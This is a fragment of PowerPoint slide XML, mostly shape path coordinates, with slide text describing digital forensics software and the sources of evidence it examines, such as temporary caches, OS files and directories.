                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1484782" y="589978"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1489405" y="583806"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495996" y="576211"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1498727" y="573341"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1467446" y="565315"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1436852" y="566889"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1380998" y="598614"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1355991" y="646811"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1352867" y="676529"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1355852" y="707961"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1238250" y="825944"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1224102" y="841400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1219390" y="859917"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1224102" y="878344"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1238250" y="893508"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1252347" y="903160"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1267879" y="906373"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1283296" y="903160"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1297051" y="893508"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1307566" y="882980"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1423289" y="767016"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1449666" y="775055"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1476832" y="773480"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1491729" y="767016"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1502486" y="762355"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1544624" y="718578"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1556372" y="674179"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1556905" y="663549"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1557274" y="6562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10237089" y="5142052"/>
            <a:ext cx="1926589" cy="6978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Temporary</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-12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endParaRPr sz="2200">
              <a:latin typeface="Trebuchet MS"/>
              <a:cs typeface="Trebuchet MS"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" marL="1905">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="15"/>
              </a:spcBef>
            </a:pP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caches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50914" y="7517638"/>
            <a:ext cx="3296285" cy="69723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367665" marR="5080" indent="-355600">
              <a:lnSpc>
                <a:spcPct val="100499"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="80"/>
              </a:spcBef>
            </a:pP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User,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Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>application,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85">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>OS </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-6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Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>files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directories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5076" y="306451"/>
            <a:ext cx="462407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10">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Digital</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-155">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="80">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Forensics</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-155">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="110">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Software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45379" y="731519"/>
            <a:ext cx="6373368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570988" y="3507740"/>
            <a:ext cx="2954020" cy="4550410"/>
            <a:chOff x="2570988" y="3507740"/>
            <a:chExt cx="2954020" cy="4550410"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="object 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3137408" y="3507740"/>
              <a:ext cx="2289810" cy="4550410"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2289810" h="4550409">
                  <a:moveTo>
                    <a:pt x="72136" y="4407369"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="44529" y="4413706"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22256" y="4429601"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7556" y="4452696"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2667" y="4480636"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8991" y="4508290"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="24876" y="4530593"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47976" y="4545306"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75946" y="4550194"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="103552" y="4543857"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="125825" y="4527961"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="140525" y="4504861"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142590" y="4493056"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="74422" y="4493056"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="73660" y="4464494"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142169" y="4462725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139090" y="4449267"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="123205" y="4426969"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="100105" y="4412257"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="72136" y="4407369"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2289810" h="4550409">
                  <a:moveTo>
                    <a:pt x="142169" y="4462725"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="73660" y="4464494"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="74422" y="4493056"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142904" y="4491264"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="145415" y="4476915"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142169" y="4462725"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2289810" h="4550409">
                  <a:moveTo>
                    <a:pt x="142904" y="4491264"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="74422" y="4493056"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142590" y="4493056"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142904" y="4491264"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2289810" h="4550409">
                  <a:moveTo>
                    <a:pt x="140239" y="58837"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="142747" y="73151"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139502" y="87362"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="184404" y="88519"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="295656" y="96900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="405130" y="110998"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="513080" y="130175"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="618870" y="154686"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="722757" y="184150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="824483" y="218694"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="923925" y="257810"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1020953" y="301751"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1115314" y="350138"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1207008" y="402844"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1295781" y="459739"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1381633" y="520826"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1464309" y="585851"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1543684" y="654685"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1619758" y="727201"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1692275" y="803275"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1761108" y="882776"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1826133" y="965454"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1887093" y="1051306"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1944116" y="1140079"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1996694" y="1231773"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2045081" y="1326261"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2088895" y="1423289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2128012" y="1522602"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2162429" y="1624330"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2192020" y="1728215"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2216404" y="1834134"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2235581" y="1941957"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2249551" y="2051685"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2257933" y="2162683"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2260854" y="2275459"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2257933" y="2388108"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2249551" y="2499106"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2235581" y="2608707"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2216277" y="2716276"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2191893" y="2822194"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2162429" y="2926080"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2128012" y="3027680"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2088895" y="3126994"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2045081" y="3223895"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1996820" y="3318255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1944116" y="3409950"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1887346" y="3498723"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1826387" y="3584448"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1761363" y="3667125"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1692656" y="3746627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1620266" y="3822573"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1544320" y="3895090"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1464945" y="3963797"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1382268" y="4028821"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1296543" y="4089908"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1207770" y="4146804"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1116330" y="4199636"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1021969" y="4247896"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="925068" y="4291838"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="825754" y="4331081"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="724154" y="4365498"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="620394" y="4395127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="514477" y="4419612"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="406781" y="4439005"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="297306" y="4452988"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="186308" y="4461586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142169" y="4462725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="145415" y="4476915"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142904" y="4491264"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="188468" y="4490072"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="300990" y="4481334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="411861" y="4467123"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="520954" y="4447451"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="628269" y="4422609"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="733297" y="4392587"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="836294" y="4357624"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="936879" y="4317873"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1034922" y="4273423"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1130554" y="4224401"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1223264" y="4170807"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1313180" y="4113149"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1400047" y="4051300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1483614" y="3985387"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1564005" y="3915664"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1640967" y="3842258"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1714245" y="3765296"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1783842" y="3684778"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1849628" y="3601085"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1911350" y="3514090"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1969008" y="3424174"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2022220" y="3331210"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2071116" y="3235706"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2115439" y="3137408"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2155063" y="3036824"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2189988" y="2933827"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2219706" y="2828671"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2244471" y="2721356"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2263902" y="2612263"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2277999" y="2501265"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2286508" y="2388743"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2289302" y="2274697"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2286508" y="2160524"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2277872" y="2048002"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2263775" y="1937004"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2244217" y="1827657"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2219452" y="1720469"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2189607" y="1615186"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2154682" y="1512062"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2114931" y="1411477"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2070481" y="1313180"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2021586" y="1217549"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1968119" y="1124585"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1910333" y="1034796"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1848484" y="947801"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1782699" y="863981"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1712976" y="783463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1639570" y="706501"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1562481" y="633095"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1481963" y="563372"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1398143" y="497459"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1311275" y="435610"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1221232" y="378079"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1128268" y="324738"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1032764" y="275717"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="934466" y="231267"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="833628" y="191515"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="730631" y="156718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="625347" y="126746"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="518032" y="102108"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="408813" y="82676"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="297815" y="68452"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="185166" y="59944"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="140239" y="58837"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2289810" h="4550409">
                  <a:moveTo>
                    <a:pt x="73152" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="45237" y="4891"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22145" y="19605"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6268" y="41915"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="69596"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4891" y="97492"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19605" y="120554"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="41915" y="136425"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="69596" y="142748"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="97492" y="137856"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="120554" y="123142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="136425" y="100832"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139502" y="87362"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="70993" y="85598"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71755" y="57150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139943" y="57150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="137856" y="45237"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="123142" y="22145"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="100832" y="6268"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="73152" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2289810" h="4550409">
                  <a:moveTo>
                    <a:pt x="71755" y="57150"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="70993" y="85598"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139502" y="87362"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142747" y="73151"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="140239" y="58837"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71755" y="57150"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2289810" h="4550409">
                  <a:moveTo>
                    <a:pt x="139943" y="57150"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="71755" y="57150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="140239" y="58837"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139943" y="5715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138422" y="370713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75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138422" y="370713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138422" y="7411974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138422" y="7411974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048250" y="478917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048250" y="478917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029961" y="6308598"/>
              <a:ext cx="459105" cy="457200"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="459104" h="457200">
                  <a:moveTo>
                    <a:pt x="229362" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="183153" y="4644"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="140106" y="17966"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="101147" y="39045"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="67198" y="66960"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="39185" y="100793"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18032" y="139624"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4662" y="182533"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="228600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4662" y="274666"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18032" y="317575"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="39185" y="356406"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="67198" y="390239"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="101147" y="418154"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="140106" y="439233"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="183153" y="452555"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="229362" y="457200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="275570" y="452555"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="318617" y="439233"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="357576" y="418154"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="391525" y="390239"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="419538" y="356406"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="440691" y="317575"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="454061" y="274666"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="458724" y="228600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="454061" y="182533"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="440691" y="139624"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="419538" y="100793"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="391525" y="66960"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="357576" y="39045"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="318617" y="17966"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="275570" y="4644"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="229362" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="17BE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029961" y="6308598"/>
              <a:ext cx="459105" cy="457200"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="459104" h="457200">
                  <a:moveTo>
                    <a:pt x="0" y="228600"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4662" y="182533"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18032" y="139624"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="39185" y="100793"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="67198" y="66960"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="101147" y="39045"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="140106" y="17966"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="183153" y="4644"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="229362" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="275570" y="4644"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="318617" y="17966"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="357576" y="39045"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="391525" y="66960"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="419538" y="100793"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="440691" y="139624"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="454061" y="182533"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="458724" y="228600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="454061" y="274666"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="440691" y="317575"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="419538" y="356406"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="391525" y="390239"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="357576" y="418154"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="318617" y="439233"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="275570" y="452555"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="229362" y="457200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="183153" y="452555"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="140106" y="439233"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="101147" y="418154"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="67198" y="390239"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="39185" y="356406"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18032" y="317575"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4662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0988" y="5145024"/>
              <a:ext cx="1274064" cy="127406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577721" y="1882292"/>
            <a:ext cx="13056869" cy="61556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01340" marR="5080" indent="-3089275">
              <a:lnSpc>
                <a:spcPct val="114100"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="5">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Digital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forensics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software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designed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assist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Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>acquisition,</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-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documentation,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analysis</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-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Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>digital </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-6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3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
